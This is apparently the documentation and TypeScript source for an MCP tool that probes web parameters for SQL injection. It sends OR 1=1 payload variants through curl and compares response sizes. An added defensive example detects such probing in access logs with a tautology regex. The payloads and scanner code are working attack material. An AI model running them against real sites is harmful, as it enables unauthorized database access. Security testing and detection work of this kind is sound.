sqli_where_bypass
Test SQL injection vulnerabilities by bypassing WHERE clauses with OR 1=1 payload variants. Compares response lengths to identify potential injection points in web applications.
Instructions
Test WHERE clause bypass via OR 1=1 variants. Sends multiple payloads (OR 1=1--, OR '1'='1, OR 1=1/*, etc.) against the target parameter and compares response lengths to the baseline. Returns baseline_length and results array. Side effects: None (read-only GET requests). Sends 7 requests total.
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Full URL with query parameter, e.g. https://target/filter?category=Gifts | |
| parameter | Yes | Vulnerable query parameter name, e.g. 'category' | |
| value | Yes | Legitimate parameter value to base the injection on, e.g. 'Gifts' | |
Implementation Reference
- src/tools/sqli.ts:20-68 (handler): The handler logic for 'sqli_where_bypass'. It constructs various SQLi payloads designed for WHERE clause bypasses, sends them using 'curl', compares the response lengths against a baseline, and returns the results.

```typescript
async ({ url, parameter, value }) => {
  requireTool("curl");

  const payloads = [
    `' OR 1=1-- -`,
    `' OR 1=1--`,
    `' OR '1'='1`,
    `' OR 1=1/*`,
    `' OR 1=1 LIMIT 1-- -`,
    `" OR ""="`,
  ];

  // Baseline request
  const baseUrl = url.split("?")[0];
  const baselineRes = await runCmd("curl", [
    "-sk",
    "-o", "/dev/null",
    "-w", "%{http_code}:%{size_download}",
    `${baseUrl}?${parameter}=${value}`,
  ]);
  const baselineParts = baselineRes.stdout.split(":");
  const baselineStatus = baselineParts.length === 2 ? parseInt(baselineParts[0], 10) : 0;
  const baselineLength = baselineParts.length === 2 ? parseInt(baselineParts[1], 10) : 0;

  const results = [];
  for (const payload of payloads) {
    const injected = `${value}${payload}`;
    const res = await runCmd("curl", [
      "-sk",
      "-o", "/dev/null",
      "-w", "%{http_code}:%{size_download}",
      `${baseUrl}?${parameter}=${injected}`,
    ]);
    const p = res.stdout.split(":");
    const status = p.length === 2 ? parseInt(p[0], 10) : 0;
    const length = p.length === 2 ? parseInt(p[1], 10) : 0;
    results.push({
      payload: injected,
      status,
      length,
      delta: length - baselineLength,
    });
  }

  const result = {
    baseline_status: baselineStatus,
    baseline_length: baselineLength,
    results,
    hint: "Positive delta suggests more data returned — potential bypass.",
  };
  return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
}
);
```

- src/tools/sqli.ts:15-19 (schema): Input schema for 'sqli_where_bypass' using Zod for validation.

```typescript
{
  url: z.string().describe("Full URL with query parameter, e.g. https://target/filter?category=Gifts"),
  parameter: z.string().describe("Vulnerable query parameter name, e.g. 'category'"),
  value: z.string().describe("Legitimate parameter value to base the injection on, e.g. 'Gifts'"),
},
```

- src/tools/sqli.ts:12-14 (registration): Registration of the 'sqli_where_bypass' tool in the McpServer.

```typescript
server.tool(
  "sqli_where_bypass",
  "Test WHERE clause bypass via OR 1=1 variants. Sends multiple payloads (OR 1=1--, OR '1'='1, OR 1=1/*, etc.) against the target parameter and compares response lengths to the baseline. Returns baseline_length and results array. Side effects: None (read-only GET requests). Sends 7 requests total.",
```
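Seen from the defending side, the requests described above leave a recognisable pattern in web access logs: one benign request, then the same parameter carrying several quote-plus-OR tautologies. The TypeScript below is an added example, not part of the project's source; it groups such requests per client, path and parameter and reports the largest response-size increase over the baseline. The function name `findWhereBypassProbes`, the combined-log-format assumption and the sample log lines are constructed for illustration.

```typescript
// Added example (not project code): spot WHERE-bypass probing in access logs.
type Finding = { client: string; path: string; parameter: string; variants: number; maxDelta: number | null };
type Group = { base: number | null; probes: Map<string, number> };

// A quote, then OR, then an always-true comparison: 1=1, '1'='1, ""="
const TAUTOLOGY = /['"]\s*OR\s+(?:(\d+)\s*=\s*\1|'([^']*)'\s*=\s*'\2|""\s*=\s*")/i;
// Assumed combined log format; the request target may contain raw spaces.
const LOG_LINE = /^(\S+) .*?"[A-Z]+ (.+) HTTP\/[\d.]+" \d{3} (\d+)/;

function decode(s: string): string {
  try { return decodeURIComponent(s.replace(/\+/g, " ")); } catch (e) { return s; }
}

function findWhereBypassProbes(lines: string[], minVariants = 3): Finding[] {
  const groups = new Map<string, Group>();
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const client = m[1], target = m[2], size = Number(m[3]);
    const q = target.indexOf("?");
    if (q < 0) continue;
    for (const pair of target.slice(q + 1).split("&")) {
      const eq = pair.indexOf("=");
      if (eq < 0) continue;
      const value = decode(pair.slice(eq + 1));
      const key = [client, target.slice(0, q), decode(pair.slice(0, eq))].join("\n");
      const g: Group = groups.get(key) ?? { base: null, probes: new Map<string, number>() };
      groups.set(key, g);
      if (TAUTOLOGY.test(value)) g.probes.set(value, size); // one entry per distinct payload
      else if (g.base === null) g.base = size; // first benign response is the baseline
    }
  }
  const findings: Finding[] = [];
  groups.forEach((g, key) => {
    if (g.probes.size < minVariants) return;
    const [client, path, parameter] = key.split("\n");
    const maxDelta = g.base === null ? null : Math.max(...Array.from(g.probes.values())) - g.base;
    findings.push({ client, path, parameter, variants: g.probes.size, maxDelta });
  });
  return findings;
}

// Constructed sample log lines (documentation IP ranges), not real traffic.
const SAMPLE_LOG = [
  `203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120`,
  `203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /filter?category=Gifts'%20OR%201=1--%20- HTTP/1.1" 200 9874`,
  `203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /filter?category=Gifts' OR '1'='1 HTTP/1.1" 500 310`,
  `203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /filter?category=Gifts%22+OR+%22%22%3D%22 HTTP/1.1" 200 5120`,
  `198.51.100.4 - - [01/Jan/2025:10:00:03 +0000] "GET /filter?category=Pets HTTP/1.1" 200 4400`,
];
```

A positive `maxDelta` means at least one probe received a larger response than the baseline, so that endpoint is the first place to look for string-concatenated SQL and to move to parameterized queries.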